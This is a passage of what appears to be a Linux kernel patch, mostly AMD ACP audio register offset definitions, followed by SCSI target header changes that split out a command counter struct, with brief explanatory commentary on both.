++#define ACP_DMA_PRIO_4                                0x0000070
++#define ACP_DMA_PRIO_5                                0x0000074
++#define ACP_DMA_PRIO_6                                0x0000078
++#define ACP_DMA_PRIO_7                                0x000007C
++#define ACP_DMA_CUR_DSCR_0                            0x0000080
++#define ACP_DMA_CUR_DSCR_1                            0x0000084
++#define ACP_DMA_CUR_DSCR_2                            0x0000088
++#define ACP_DMA_CUR_DSCR_3                            0x000008C
++#define ACP_DMA_CUR_DSCR_4                            0x0000090
++#define ACP_DMA_CUR_DSCR_5                            0x0000094
++#define ACP_DMA_CUR_DSCR_6                            0x0000098
++#define ACP_DMA_CUR_DSCR_7                            0x000009C
++#define ACP_DMA_CUR_TRANS_CNT_0                       0x00000A0
++#define ACP_DMA_CUR_TRANS_CNT_1                       0x00000A4
++#define ACP_DMA_CUR_TRANS_CNT_2                       0x00000A8
++#define ACP_DMA_CUR_TRANS_CNT_3                       0x00000AC
++#define ACP_DMA_CUR_TRANS_CNT_4                       0x00000B0
++#define ACP_DMA_CUR_TRANS_CNT_5                       0x00000B4
++#define ACP_DMA_CUR_TRANS_CNT_6                       0x00000B8
++#define ACP_DMA_CUR_TRANS_CNT_7                       0x00000BC
++#define ACP_DMA_ERR_STS_0                             0x00000C0
++#define ACP_DMA_ERR_STS_1                             0x00000C4
++#define ACP_DMA_ERR_STS_2                             0x00000C8
++#define ACP_DMA_ERR_STS_3                             0x00000CC
++#define ACP_DMA_ERR_STS_4                             0x00000D0
++#define ACP_DMA_ERR_STS_5                             0x00000D4
++#define ACP_DMA_ERR_STS_6                             0x00000D8
++#define ACP_DMA_ERR_STS_7                             0x00000DC
++#define ACP_DMA_DESC_BASE_ADDR                        0x00000E0
++#define ACP_DMA_DESC_MAX_NUM_DSCR                     0x00000E4
++#define ACP_DMA_CH_STS                                0x00000E8
++#define ACP_DMA_CH_GROUP                              0x00000EC
++#define ACP_DMA_CH_RST_STS                            0x00000F0
++
++/* Registers from ACP_AXI2AXIATU block */
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1                0x0000C00
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_1                0x0000C04
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_2                0x0000C08
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_2                0x0000C0C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_3                0x0000C10
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_3                0x0000C14
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_4                0x0000C18
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_4                0x0000C1C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_5                0x0000C20
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_5                0x0000C24
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_6                0x0000C28
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_6                0x0000C2C
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_7                0x0000C30
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_7                0x0000C34
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_8                0x0000C38
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_8                0x0000C3C
++#define ACPAXI2AXI_ATU_CTRL                           0x0000C40
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_9                0x0000C44
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_9                0x0000C48
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_10               0x0000C4C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_10               0x0000C50
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_11               0x0000C54
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_11               0x0000C58
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_12               0x0000C5C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_12               0x0000C60
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_13               0x0000C64
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_13               0x0000C68
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_14               0x0000C6C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_14               0x0000C70
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_15               0x0000C74
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_15               0x0000C78
++#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_16               0x0000C7C
++#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_16               0x0000C80
++
++/* Registers from ACP_CLKRST block */
++#define ACP_SOFT_RESET                                0x0001000
++#define ACP_CONTROL                                   0x0001004
++#define ACP_STATUS                                    0x0001008
++#define ACP_DYNAMIC_CG_MASTER_CONTROL                 0x0001010
++#define ACP_ZSC_DSP_CTRL                              0x0001014
++#define ACP_ZSC_STS                                   0x0001018
++#define ACP_PGFSM_CONTROL                             0x0001024
++#define ACP_PGFSM_STATUS                              0x0001028
++#define ACP_CLKMUX_SEL                                0x000102C
++
++/* Registers from ACP_AON block */
++#define ACP_PME_EN                                    0x0001400
++#define ACP_DEVICE_STATE                              0x0001404
++#define AZ_DEVICE_STATE                               0x0001408
++#define ACP_PIN_CONFIG                                0x0001440
++#define ACP_PAD_PULLUP_CTRL                           0x0001444
++#define ACP_PAD_PULLDOWN_CTRL                         0x0001448
++#define ACP_PAD_DRIVE_STRENGTH_CTRL                   0x000144C
++#define ACP_PAD_SCHMEN_CTRL                           0x0001450
++#define ACP_SW_PAD_KEEPER_EN                          0x0001454
++#define ACP_SW_WAKE_EN                                0x0001458
++#define ACP_I2S_WAKE_EN                               0x000145C
++#define ACP_SW1_WAKE_EN                               0x0001460
++
++/* Registers from ACP_P1_MISC block */
++#define ACP_EXTERNAL_INTR_ENB                         0x0001A00
++#define ACP_EXTERNAL_INTR_CNTL                        0x0001A04
++#define ACP_EXTERNAL_INTR_CNTL1                       0x0001A08
++#define ACP_EXTERNAL_INTR_STAT                        0x0001A0C
++#define ACP_EXTERNAL_INTR_STAT1                       0x0001A10
++#define ACP_ERROR_STATUS                              0x0001A4C
++#define ACP_P1_SW_I2S_ERROR_REASON                    0x0001A50
++#define ACP_P1_SW_POS_TRACK_I2S_TX_CTRL               0x0001A6C
++#define ACP_P1_SW_I2S_TX_DMA_POS                      0x0001A70
++#define ACP_P1_SW_POS_TRACK_I2S_RX_CTRL               0x0001A74
++#define ACP_P1_SW_I2S_RX_DMA_POS                      0x0001A78
++#define ACP_P1_DMIC_I2S_GPIO_INTR_CTRL                0x0001A7C
++#define ACP_P1_DMIC_I2S_GPIO_INTR_STATUS              0x0001A80
++#define ACP_SCRATCH_REG_BASE_ADDR                     0x0001A84
++#define ACP_P1_SW_POS_TRACK_BT_TX_CTRL                0x0001A88
++#define ACP_P1_SW_BT_TX_DMA_POS                       0x0001A8C
++#define ACP_P1_SW_POS_TRACK_HS_TX_CTRL                0x0001A90
++#define ACP_P1_SW_HS_TX_DMA_POS                       0x0001A94
++#define ACP_P1_SW_POS_TRACK_BT_RX_CTRL                0x0001A98
++#define ACP_P1_SW_BT_RX_DMA_POS                       0x0001A9C
++#define ACP_P1_SW_POS_TRACK_HS_RX_CTRL                0x0001AA0
++#define ACP_P1_SW_HS_RX_DMA_POS                       0x0001AA4
++
++/* Registers from ACP_AUDIO_BUFFERS block */
++#define ACP_I2S_RX_RINGBUFADDR                        0x0002000
++#define ACP_I2S_RX_RINGBUFSIZE                        0x0002004
++#define ACP_I2S_RX_LINKPOSITIONCNTR                   0x0002008
++#define ACP_I2S_RX_FIFOADDR                           0x000200C
++#define ACP_I2S_RX_FIFOSIZE                           0x0002010
++#define ACP_I2S_RX_DMA_SIZE                           0x0002014
++#define ACP_I2S_RX_LINEARPOSITIONCNTR_HIGH            0x0002018
++#define ACP_I2S_RX_LINEARPOSITIONCNTR_LOW             0x000201C
++#define ACP_I2S_RX_INTR_WATERMARK_SIZE                0x0002020
++#define ACP_I2S_TX_RINGBUFADDR                        0x0002024
++#define ACP_I2S_TX_RINGBUFSIZE                        0x0002028
++#define ACP_I2S_TX_LINKPOSITIONCNTR                   0x000202C
++#define ACP_I2S_TX_FIFOADDR                           0x0002030
++#define ACP_I2S_TX_FIFOSIZE                           0x0002034
++#define ACP_I2S_TX_DMA_SIZE                           0x0002038
++#define ACP_I2S_TX_LINEARPOSITIONCNTR_HIGH            0x000203C
++#define ACP_I2S_TX_LINEARPOSITIONCNTR_LOW             0x0002040
++#define ACP_I2S_TX_INTR_WATERMARK_SIZE                0x0002044
++#define ACP_BT_RX_RINGBUFADDR                         0x0002048
++#define ACP_BT_RX_RINGBUFSIZE                         0x000204C
++#define ACP_BT_RX_LINKPOSITIONCNTR                    0x0002050
++#define ACP_BT_RX_FIFOADDR                            0x0002054
++#define ACP_BT_RX_FIFOSIZE                            0x0002058
++#define ACP_BT_RX_DMA_SIZE                            0x000205C
++#define ACP_BT_RX_LINEARPOSITIONCNTR_HIGH             0x0002060
++#define ACP_BT_RX_LINEARPOSITIONCNTR_LOW              0x0002064
++#define ACP_BT_RX_INTR_WATERMARK_SIZE                 0x0002068
++#define ACP_BT_TX_RINGBUFADDR                         0x000206C
++#define ACP_BT_TX_RINGBUFSIZE                         0x0002070
++#define ACP_BT_TX_LINKPOSITIONCNTR                    0x0002074
++#define ACP_BT_TX_FIFOADDR                            0x0002078
++#define ACP_BT_TX_FIFOSIZE                            0x000207C
++#define ACP_BT_TX_DMA_SIZE                            0x0002080
++#define ACP_BT_TX_LINEARPOSITIONCNTR_HIGH             0x0002084
++#define ACP_BT_TX_LINEARPOSITIONCNTR_LOW              0x0002088
++#define ACP_BT_TX_INTR_WATERMARK_SIZE                 0x000208C
++#define ACP_HS_RX_RINGBUFADDR                         0x0002090
++#define ACP_HS_RX_RINGBUFSIZE                         0x0002094
++#define ACP_HS_RX_LINKPOSITIONCNTR                    0x0002098
++#define ACP_HS_RX_FIFOADDR                            0x000209C
++#define ACP_HS_RX_FIFOSIZE                            0x00020A0
++#define ACP_HS_RX_DMA_SIZE                            0x00020A4
++#define ACP_HS_RX_LINEARPOSITIONCNTR_HIGH             0x00020A8
++#define ACP_HS_RX_LINEARPOSITIONCNTR_LOW              0x00020AC
++#define ACP_HS_RX_INTR_WATERMARK_SIZE                 0x00020B0
++#define ACP_HS_TX_RINGBUFADDR                         0x00020B4
++#define ACP_HS_TX_RINGBUFSIZE                         0x00020B8
++#define ACP_HS_TX_LINKPOSITIONCNTR                    0x00020BC
++#define ACP_HS_TX_FIFOADDR                            0x00020C0
++#define ACP_HS_TX_FIFOSIZE                            0x00020C4
++#define ACP_HS_TX_DMA_SIZE                            0x00020C8
++#define ACP_HS_TX_LINEARPOSITIONCNTR_HIGH             0x00020CC
++#define ACP_HS_TX_LINEARPOSITIONCNTR_LOW              0x00020D0
++#define ACP_HS_TX_INTR_WATERMARK_SIZE                 0x00020D4
++
++/* Registers from ACP_I2S_TDM block */
++#define ACP_I2STDM_IER                                0x0002400
++#define ACP_I2STDM_IRER                               0x0002404
++#define ACP_I2STDM_RXFRMT                             0x0002408
++#define ACP_I2STDM_ITER                               0x000240C
++#define ACP_I2STDM_TXFRMT                             0x0002410
++#define ACP_I2STDM0_MSTRCLKGEN                        0x0002414
++#define ACP_I2STDM1_MSTRCLKGEN                        0x0002418
++#define ACP_I2STDM2_MSTRCLKGEN                        0x000241C
++#define ACP_I2STDM_REFCLKGEN                          0x0002420
++
++/* Registers from ACP_BT_TDM block */
++#define ACP_BTTDM_IER                                 0x0002800
++#define ACP_BTTDM_IRER                                0x0002804
++#define ACP_BTTDM_RXFRMT                              0x0002808
++#define ACP_BTTDM_ITER                                0x000280C
++#define ACP_BTTDM_TXFRMT                              0x0002810
++#define ACP_HSTDM_IER                                 0x0002814
++#define ACP_HSTDM_IRER                                0x0002818
++#define ACP_HSTDM_RXFRMT                              0x000281C
++#define ACP_HSTDM_ITER                                0x0002820
++#define ACP_HSTDM_TXFRMT                              0x0002824
++
++/* Registers from ACP_WOV block */
++#define ACP_WOV_PDM_ENABLE                            0x0002C04
++#define ACP_WOV_PDM_DMA_ENABLE                        0x0002C08
++#define ACP_WOV_RX_RINGBUFADDR                        0x0002C0C
++#define ACP_WOV_RX_RINGBUFSIZE                        0x0002C10
++#define ACP_WOV_RX_LINKPOSITIONCNTR                   0x0002C14
++#define ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH            0x0002C18
++#define ACP_WOV_RX_LINEARPOSITIONCNTR_LOW             0x0002C1C
++#define ACP_WOV_RX_INTR_WATERMARK_SIZE                0x0002C20
++#define ACP_WOV_PDM_FIFO_FLUSH                        0x0002C24
++#define ACP_WOV_PDM_NO_OF_CHANNELS                    0x0002C28
++#define ACP_WOV_PDM_DECIMATION_FACTOR                 0x0002C2C
++#define ACP_WOV_PDM_VAD_CTRL                          0x0002C30
++#define ACP_WOV_WAKE                                  0x0002C54
++#define ACP_WOV_BUFFER_STATUS                         0x0002C58
++#define ACP_WOV_MISC_CTRL                             0x0002C5C
++#define ACP_WOV_CLK_CTRL                              0x0002C60
++#define ACP_PDM_VAD_DYNAMIC_CLK_GATING_EN             0x0002C64
++#define ACP_WOV_ERROR_STATUS_REGISTER                 0x0002C68
++#define ACP_PDM_CLKDIV                                0x0002C6C
++
++/* Registers from ACP_P1_AUDIO_BUFFERS block */
++#define ACP_P1_I2S_RX_RINGBUFADDR                     0x0003A00
++#define ACP_P1_I2S_RX_RINGBUFSIZE                     0x0003A04
++#define ACP_P1_I2S_RX_LINKPOSITIONCNTR                0x0003A08
++#define ACP_P1_I2S_RX_FIFOADDR                        0x0003A0C
++#define ACP_P1_I2S_RX_FIFOSIZE                        0x0003A10
++#define ACP_P1_I2S_RX_DMA_SIZE                        0x0003A14
++#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_HIGH         0x0003A18
++#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_LOW          0x0003A1C
++#define ACP_P1_I2S_RX_INTR_WATERMARK_SIZE             0x0003A20
++#define ACP_P1_I2S_TX_RINGBUFADDR                     0x0003A24
++#define ACP_P1_I2S_TX_RINGBUFSIZE                     0x0003A28
++#define ACP_P1_I2S_TX_LINKPOSITIONCNTR                0x0003A2C
++#define ACP_P1_I2S_TX_FIFOADDR                        0x0003A30
++#define ACP_P1_I2S_TX_FIFOSIZE                        0x0003A34
++#define ACP_P1_I2S_TX_DMA_SIZE                        0x0003A38
++#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_HIGH         0x0003A3C
++#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_LOW          0x0003A40
++#define ACP_P1_I2S_TX_INTR_WATERMARK_SIZE             0x0003A44
++#define ACP_P1_BT_RX_RINGBUFADDR                      0x0003A48
++#define ACP_P1_BT_RX_RINGBUFSIZE                      0x0003A4C
++#define ACP_P1_BT_RX_LINKPOSITIONCNTR                 0x0003A50
++#define ACP_P1_BT_RX_FIFOADDR                         0x0003A54
++#define ACP_P1_BT_RX_FIFOSIZE                         0x0003A58
++#define ACP_P1_BT_RX_DMA_SIZE                         0x0003A5C
++#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_HIGH          0x0003A60
++#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_LOW           0x0003A64
++#define ACP_P1_BT_RX_INTR_WATERMARK_SIZE              0x0003A68
++#define ACP_P1_BT_TX_RINGBUFADDR                      0x0003A6C
++#define ACP_P1_BT_TX_RINGBUFSIZE                      0x0003A70
++#define ACP_P1_BT_TX_LINKPOSITIONCNTR                 0x0003A74
++#define ACP_P1_BT_TX_FIFOADDR                         0x0003A78
++#define ACP_P1_BT_TX_FIFOSIZE                         0x0003A7C
++#define ACP_P1_BT_TX_DMA_SIZE                         0x0003A80
++#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_HIGH          0x0003A84
++#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_LOW           0x0003A88
++#define ACP_P1_BT_TX_INTR_WATERMARK_SIZE              0x0003A8C
++#define ACP_P1_HS_RX_RINGBUFADDR                      0x0003A90
++#define ACP_P1_HS_RX_RINGBUFSIZE                      0x0003A94
++#define ACP_P1_HS_RX_LINKPOSITIONCNTR                 0x0003A98
++#define ACP_P1_HS_RX_FIFOADDR                         0x0003A9C
++#define ACP_P1_HS_RX_FIFOSIZE                         0x0003AA0
++#define ACP_P1_HS_RX_DMA_SIZE                         0x0003AA4
++#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_HIGH          0x0003AA8
++#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_LOW           0x0003AAC
++#define ACP_P1_HS_RX_INTR_WATERMARK_SIZE              0x0003AB0
++#define ACP_P1_HS_TX_RINGBUFADDR                      0x0003AB4
++#define ACP_P1_HS_TX_RINGBUFSIZE                      0x0003AB8
++#define ACP_P1_HS_TX_LINKPOSITIONCNTR                 0x0003ABC
++#define ACP_P1_HS_TX_FIFOADDR                         0x0003AC0
++#define ACP_P1_HS_TX_FIFOSIZE                         0x0003AC4
++#define ACP_P1_HS_TX_DMA_SIZE                         0x0003AC8
++#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_HIGH          0x0003ACC
++#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_LOW           0x0003AD0
++#define ACP_P1_HS_TX_INTR_WATERMARK_SIZE              0x0003AD4
++
++/* Registers from ACP_SCRATCH block */
++#define ACP_SCRATCH_REG_0                             0x0010000
++#define ACP_SCRATCH_REG_1                             0x0010004
++#define ACP_SCRATCH_REG_2                             0x0010008
++#define ACP_SCRATCH_REG_3                             0x001000C
++#define ACP_SCRATCH_REG_4                             0x0010010
++#define ACP_SCRATCH_REG_5                             0x0010014
++#define ACP_SCRATCH_REG_6                             0x0010018
++#define ACP_SCRATCH_REG_7                             0x001001C
++#define ACP_SCRATCH_REG_8                             0x0010020
++#define ACP_SCRATCH_REG_9                             0x0010024
++#define ACP_SCRATCH_REG_10                            0x0010028
++#define ACP_SCRATCH_REG_11                            0x001002C
++#define ACP_SCRATCH_REG_12                            0x0010030
++#define ACP_SCRATCH_REG_13                            0x0010034
++#define ACP_SCRATCH_REG_14                            0x0010038
++#define ACP_SCRATCH_REG_15                            0x001003C
++#define ACP_SCRATCH_REG_16                            0x0010040
++#define ACP_SCRATCH_REG_17                            0x0010044
++#define ACP_SCRATCH_REG_18                            0x0010048
++#define ACP_SCRATCH_REG_19                            0x001004C
++#define ACP_SCRATCH_REG_20                            0x0010050
++#define ACP_SCRATCH_REG_21                            0x0010054
++#define ACP_SCRATCH_REG_22                            0x0010058
++#define ACP_SCRATCH_REG_23                            0x001005C
++#define ACP_SCRATCH_REG_24                            0x0010060
++#define ACP_SCRATCH_REG_25                            0x0010064
++#define ACP_SCRATCH_REG_26                            0x0010068
++#define ACP_SCRATCH_REG_27                            0x001006C
++#define ACP_SCRATCH_REG_28                            0x0010070
++#define ACP_SCRATCH_REG_29                            0x0010074
++#define ACP_SCRATCH_REG_30                            0x0010078
++#define ACP_SCRATCH_REG_31                            0x001007C
++#define ACP_SCRATCH_REG_32                            0x0010080
++#define ACP_SCRATCH_REG_33                            0x0010084
++#define ACP_SCRATCH_REG_34                            0x0010088
++#define ACP_SCRATCH_REG_35                            0x001008C
++#define ACP_SCRATCH_REG_36                            0x0010090
++#define ACP_SCRATCH_REG_37                            0x0010094
++#define ACP_SCRATCH_REG_38                            0x0010098
++#define ACP_SCRATCH_REG_39                            0x001009C
++#define ACP_SCRATCH_REG_40                            0x00100A0
++#define ACP_SCRATCH_REG_41                            0x00100A4
++#define ACP_SCRATCH_REG_42                            0x00100A8
++#define ACP_SCRATCH_REG_43                            0x00100AC
++#define ACP_SCRATCH_REG_44                            0x00100B0
++#define ACP_SCRATCH_REG_45                            0x00100B4
++#define ACP_SCRATCH_REG_46                            0x00100B8
++#define ACP_SCRATCH_REG_47                            0x00100BC
++#define ACP_SCRATCH_REG_48                            0x00100C0
++#define ACP_SCRATCH_REG_49                            0x00100C4
++#define ACP_SCRATCH_REG_50                            0x00100C8
++#define ACP_SCRATCH_REG_51                            0x00100CC
++#define ACP_SCRATCH_REG_52                            0x00100D0
++#define ACP_SCRATCH_REG_53                            0x00100D4
++#define ACP_SCRATCH_REG_54                            0x00100D8
++#define ACP_SCRATCH_REG_55                            0x00100DC
++#define ACP_SCRATCH_REG_56                            0x00100E0
++#define ACP_SCRATCH_REG_57                            0x00100E4
++#define ACP_SCRATCH_REG_58                            0x00100E8
++#define ACP_SCRATCH_REG_59                            0x00100EC
++#define ACP_SCRATCH_REG_60                            0x00100F0
++#define ACP_SCRATCH_REG_61                            0x00100F4
++#define ACP_SCRATCH_REG_62                            0x00100F8
++#define ACP_SCRATCH_REG_63                            0x00100FC
++#define ACP_SCRATCH_REG_64                            0x0010100
++#define ACP_SCRATCH_REG_65                            0x0010104
++#define ACP_SCRATCH_REG_66                            0x0010108
++#define ACP_SCRATCH_REG_67                            0x001010C
++#define ACP_SCRATCH_REG_68                            0x0010110
++#define ACP_SCRATCH_REG_69                            0x0010114
++#define ACP_SCRATCH_REG_70                            0x0010118
++#define ACP_SCRATCH_REG_71                            0x001011C
++#define ACP_SCRATCH_REG_72                            0x0010120
++#define ACP_SCRATCH_REG_73                            0x0010124
++#define ACP_SCRATCH_REG_74                            0x0010128
++#define ACP_SCRATCH_REG_75                            0x001012C
++#define ACP_SCRATCH_REG_76                            0x0010130
++#define ACP_SCRATCH_REG_77                            0x0010134
++#define ACP_SCRATCH_REG_78                            0x0010138
++#define ACP_SCRATCH_REG_79                            0x001013C
++#define ACP_SCRATCH_REG_80                            0x0010140
++#define ACP_SCRATCH_REG_81                            0x0010144
++#define ACP_SCRATCH_REG_82                            0x0010148
++#define ACP_SCRATCH_REG_83                            0x001014C
++#define ACP_SCRATCH_REG_84                            0x0010150
++#define ACP_SCRATCH_REG_85                            0x0010154
++#define ACP_SCRATCH_REG_86                            0x0010158
++#define ACP_SCRATCH_REG_87                            0x001015C
++#define ACP_SCRATCH_REG_88                            0x0010160
++#define ACP_SCRATCH_REG_89                            0x0010164
++#define ACP_SCRATCH_REG_90                            0x0010168
++#define ACP_SCRATCH_REG_91                            0x001016C
++#define ACP_SCRATCH_REG_92                            0x0010170
++#define ACP_SCRATCH_REG_93                            0x0010174
++#define ACP_SCRATCH_REG_94                            0x0010178
++#define ACP_SCRATCH_REG_95                            0x001017C
++#define ACP_SCRATCH_REG_96                            0x0010180
++#define ACP_SCRATCH_REG_97                            0x0010184
++#define ACP_SCRATCH_REG_98                            0x0010188
++#define ACP_SCRATCH_REG_99                            0x001018C
++#define ACP_SCRATCH_REG_100                           0x0010190
++#define ACP_SCRATCH_REG_101                           0x0010194
++#define ACP_SCRATCH_REG_102                           0x0010198
++#define ACP_SCRATCH_REG_103                           0x001019C
++#define ACP_SCRATCH_REG_104                           0x00101A0
++#define ACP_SCRATCH_REG_105                           0x00101A4
++#define ACP_SCRATCH_REG_106                           0x00101A8
++#define ACP_SCRATCH_REG_107                           0x00101AC
++#define ACP_SCRATCH_REG_108                           0x00101B0
++#define ACP_SCRATCH_REG_109                           0x00101B4
++#define ACP_SCRATCH_REG_110                           0x00101B8
++#define ACP_SCRATCH_REG_111                           0x00101BC
++#define ACP_SCRATCH_REG_112                           0x00101C0
++#define ACP_SCRATCH_REG_113                           0x00101C4
++#define ACP_SCRATCH_REG_114                           0x00101C8
++#define ACP_SCRATCH_REG_115                           0x00101CC
++#define ACP_SCRATCH_REG_116                           0x00101D0
++#define ACP_SCRATCH_REG_117                           0x00101D4
++#define ACP_SCRATCH_REG_118                           0x00101D8
++#define ACP_SCRATCH_REG_119                           0x00101DC
++#define ACP_SCRATCH_REG_120                           0x00101E0
++#define ACP_SCRATCH_REG_121                           0x00101E4
++#define ACP_SCRATCH_REG_122                           0x00101E8
++#define ACP_SCRATCH_REG_123                           0x00101EC
++#define ACP_SCRATCH_REG_124                           0x00101F0
++#define ACP_SCRATCH_REG_125                           0x00101F4
++#define ACP_SCRATCH_REG_126                           0x00101F8
++#define ACP_SCRATCH_REG_127                           0x00101FC
++#define ACP_SCRATCH_REG_128                           0x0010200
++#endif
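A note on the header added above: every bank in acp63_chip_offset_byte.h advances in 4-byte strides (ACP_SCRATCH_REG_128 = 0x0010000 + 128 * 0x4 = 0x0010200), so a driver that walks a bank can index instead of naming each register. A minimal sketch; the ACP_SCRATCH_REG() helper is hypothetical and not part of the header:

	/* Hypothetical helper: scratch registers sit 4 bytes apart. */
	#define ACP_SCRATCH_REG(n)	(ACP_SCRATCH_REG_0 + ((n) * 0x4))

	static void acp_write_scratch(void __iomem *acp_base,
				      const u32 *payload, int words)
	{
		int i;

		for (i = 0; i < words; i++)
			writel(payload[i], acp_base + ACP_SCRATCH_REG(i));
	}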
+diff --git a/include/target/iscsi/iscsi_target_core.h b/include/target/iscsi/iscsi_target_core.h
+index 94d06ddfd80ad..229118156a1f6 100644
+--- a/include/target/iscsi/iscsi_target_core.h
++++ b/include/target/iscsi/iscsi_target_core.h
+@@ -600,6 +600,7 @@ struct iscsit_conn {
+ 	struct iscsi_tpg_np	*tpg_np;
+ 	/* Pointer to parent session */
+ 	struct iscsit_session	*sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	int			bitmap_id;
+ 	int			rx_thread_active;
+ 	struct task_struct	*rx_thread;
+diff --git a/include/target/target_core_base.h b/include/target/target_core_base.h
+index 8c920456edd93..010e966aee0a5 100644
+--- a/include/target/target_core_base.h
++++ b/include/target/target_core_base.h
+@@ -492,6 +492,7 @@ struct se_cmd {
+ 	struct se_lun		*se_lun;
+ 	/* Only used for internal passthrough and legacy TCM fabric modules */
+ 	struct se_session	*se_sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_tmr_req	*se_tmr_req;
+ 	struct llist_node	se_cmd_list;
+ 	struct completion	*free_compl;
+@@ -617,22 +618,26 @@ static inline struct se_node_acl *fabric_stat_to_nacl(struct config_item *item)
+ 			acl_fabric_stat_group);
+ }
+ 
+-struct se_session {
++struct target_cmd_counter {
++	struct percpu_ref	refcnt;
++	wait_queue_head_t	refcnt_wq;
++	struct completion	stop_done;
+ 	atomic_t		stopped;
++};
++
++struct se_session {
+ 	u64			sess_bin_isid;
+ 	enum target_prot_op	sup_prot_ops;
+ 	enum target_prot_type	sess_prot_type;
+ 	struct se_node_acl	*se_node_acl;
+ 	struct se_portal_group *se_tpg;
+ 	void			*fabric_sess_ptr;
+-	struct percpu_ref	cmd_count;
+ 	struct list_head	sess_list;
+ 	struct list_head	sess_acl_list;
+ 	spinlock_t		sess_cmd_lock;
+-	wait_queue_head_t	cmd_count_wq;
+-	struct completion	stop_done;
+ 	void			*sess_cmd_map;
+ 	struct sbitmap_queue	sess_tag_pool;
++	struct target_cmd_counter *cmd_cnt;
+ };
+ 
+ struct se_device;
+@@ -865,6 +870,7 @@ struct se_device {
+ 	struct rcu_head		rcu_head;
+ 	int			queue_cnt;
+ 	struct se_device_queue	*queues;
++	struct mutex		lun_reset_mutex;
+ };
+ 
+ struct se_hba {
+diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h
+index 38f0662476d14..b188b1e90e1ed 100644
+--- a/include/target/target_core_fabric.h
++++ b/include/target/target_core_fabric.h
+@@ -133,7 +133,12 @@ struct se_session *target_setup_session(struct se_portal_group *,
+ 				struct se_session *, void *));
+ void target_remove_session(struct se_session *);
+ 
+-int transport_init_session(struct se_session *se_sess);
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt);
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt);
++struct target_cmd_counter *target_alloc_cmd_counter(void);
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt);
++
++void transport_init_session(struct se_session *se_sess);
+ struct se_session *transport_alloc_session(enum target_prot_op);
+ int transport_alloc_session_tags(struct se_session *, unsigned int,
+ 		unsigned int);
+@@ -149,9 +154,11 @@ void	transport_deregister_session_configfs(struct se_session *);
+ void	transport_deregister_session(struct se_session *);
+ 
+ 
+-void	__target_init_cmd(struct se_cmd *,
+-		const struct target_core_fabric_ops *,
+-		struct se_session *, u32, int, int, unsigned char *, u64);
++void	__target_init_cmd(struct se_cmd *cmd,
++		const struct target_core_fabric_ops *tfo,
++		struct se_session *sess, u32 data_length, int data_direction,
++		int task_attr, unsigned char *sense_buffer, u64 unpacked_lun,
++		struct target_cmd_counter *cmd_cnt);
+ int	target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 		unsigned char *sense, u64 unpacked_lun, u32 data_length,
+ 		int task_attr, int data_dir, int flags);
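The three target-core header hunks above are one refactor: the percpu command refcount leaves struct se_session and becomes a standalone struct target_cmd_counter that se_session, se_cmd and iscsit_conn all point at, so iSCSI can drain outstanding commands per connection rather than per session. A sketch of the intended lifecycle against the new prototypes only; the NULL-on-failure convention is an assumption:

	struct target_cmd_counter *cnt;

	cnt = target_alloc_cmd_counter();
	if (!cnt)			/* assumed failure convention */
		return -ENOMEM;

	/* ... commands take/drop references against cnt while in flight ... */

	target_stop_cmd_counter(cnt);	/* refuse new submissions */
	target_wait_for_cmds(cnt);	/* block until in-flight commands drain */
	target_free_cmd_counter(cnt);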
+diff --git a/include/trace/events/qrtr.h b/include/trace/events/qrtr.h
+index b1de14c3bb934..441132c67133f 100644
+--- a/include/trace/events/qrtr.h
++++ b/include/trace/events/qrtr.h
+@@ -10,15 +10,16 @@
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
